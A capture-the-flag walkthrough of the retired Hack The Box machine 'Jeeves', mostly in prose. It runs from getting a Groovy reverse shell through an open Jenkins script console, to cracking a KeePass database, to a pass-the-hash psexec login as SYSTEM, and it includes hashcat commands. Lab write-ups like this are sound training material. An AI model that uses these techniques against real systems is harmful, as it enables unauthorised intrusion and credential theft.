Hack The Box: Jeeves
Hack The Box, retired machine: Jeeves. This is a great ‘medium’ box that provides an opportunity for an interesting privilege escalation and the opportunity to attack Jenkins! Jenkins is an open-source automation server for building, testing, deployment, and continuous integration / delivery (CI/CD - DevOps tool). Jenkins is used all across the industry and is likely to appear in enterprise environments. Today we will exploit it.
Initial Enumeration
Touching the ports briefly to see what we have available to us reveals a webserver, RPC, SMB, and an ambiguous port.
Scanning these ports more intentionally reveals an IIS server, confirmation of the operating system (Windows), another webserver hosting Jetty. The Jenkins component is likely where ‘Ask Jeeves’ is (port 80).
We should visit the IP address of the target in our browser: https://10.10.10.63 (with HTTP or HTTPS). See what we are returned with:
There is nothing particularly significant at face value. Our next steps, check the source code of the page (look for comments that could have links to other pages, hard-coded credentials left in testing / building, attempt to find a /robots.txt page, and then begin directory brute forcing.
We are unable to find anything valuable on port 80, time to shift to port 50000
The source code reveals nothing here, but we will begin fuzzing on this one too.
Using this particular wordlist from the dirbuster category on Kali will return you with an interesting page.
Visiting the /askjeeves page we are welcomed to the Jenkins web portal. We do not need to login in this case as we have access to everything for configurations. Our next step will be to proceed to Manage Jenkins > Script Console. To see if we have the ability to use illicit scripts that may return a reverse shell to us.
Welcome to Jenkins.
The Jenkins script console provides an opportunity to attempt using Groovy scripts to execute with malicious intentions. We do not have to come up with this ourselves. We can visit a website like https://www.revshells.com/ to create a Groovy reverse shell automatically for us. Now we need to copy that into our script console, and BEFORE running it start a reverse shell listener using NETCAT:
Make sure the port matches the one in the generated reverse shell you create.
MAKE SURE- you configure the payload to match your listener / host address. Also change the “cmd” parameter to “CMD” because this is a windows target, if it were Linux we’d use /bin/bash to spawn a bash session, or try other shells. Once ready click RUN and we will get a low level user shell:
We’re in.
This is great, we have a session on the host as a user “kohsuke”, with the SeImpersonatePrivilege - an easy privilege escalation. This is the unintended path to escalating our privileges, refer to my most recent writeup for “Squid” where that is exploited. We will be doing the intended way.
At this point we should be doing the following. Look through our C:\ drive, User folders, networking information to search for a DUAL NIC’d host (internal network / pivot options?), searching for plaintext credentials stored anywhere… etc. Great options for automated searching is winpeas: https://github.com/peass-ng/PEASS-ng/blob/master/winPEAS/winPEASexe/README.md
C:\Users\kohsuke\Documents is where we will find a something. Keepass is a password manager and we found a database file for it. That is really juicy, we need to get this back to our host machine to crack the contents of it. This is the result of doing your due diligence in hunting for potential avenues for privilege escalation.
To get this file back to our Kali machine we have a lot of options: ftp server, netcat, smb. I never use the SMB method so I am doing that today.
Starting an impacket-SMBserver on our Kali machine, hosted in the current working directory.
Copying the file of interest to our machines share we created.
The machine making a connection back returns a NTLMv2 hash.
A nice bonus is we also on the connection get the NTLMv2 hash of the user account “Kohsuke”. We could crack this using hashcat by putting that into a file and doing: hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -O. That password could potentially be the same for the local administrator, other users, its important to note that passwords are passable around a network and re-use is common. Onto cracking our KEEPASS database.
John the Ripper has a suite of conversion tools, such as keepass2john for these scenarioss.
Using John on our converted hash file will enable us to obtain the password for the Keepass file itself. Now we can use KPCLI (KeePass Command Line) on our Kali machine or we could use that password on the target host if we have a RDP session, or transfer it to another Windows host to open it.
KPCLI allows us to login and we have a database to comb through.
We have obtained a password hash.
This is great. We find a password hash in the 0 entry. We can call upon that entry with the show -f <ENTRY> syntax. Now we can feed that into hashcat or john. This is an NTLM hash (mode 1000) for your cracking purposes: hashcat -m 1000 "e0fb1fb85756c24235ff238cbe81fe00" /usr/share/wordlists/rockyou.txt
Spoiler, this will not work. So we will instead do a Pass-The-Hash (PTH) attack, with Impacket (psexec) to attempt to login as the Administrator user on the machine with this.
We are successfully logged in as the admin user (System ROOT NT AUTHORITY \ SYSTEM) - privilege escalation complete.
We do not find a root.txt / proof.txt flag. When we list directories recursively with /r we are able to see alternate data steams (ADS) on the HM file.
Flag is blurred out but you have all the resources to find it.
We are able to see the contents of the real flag. Alternate Data Streams (ADS) are essentially sub-files inside of a file. It is at face value hidden. We are able to read the sub-file using PowerShell with particular flags.
Congratulations. You’ve rooted Jeeves.
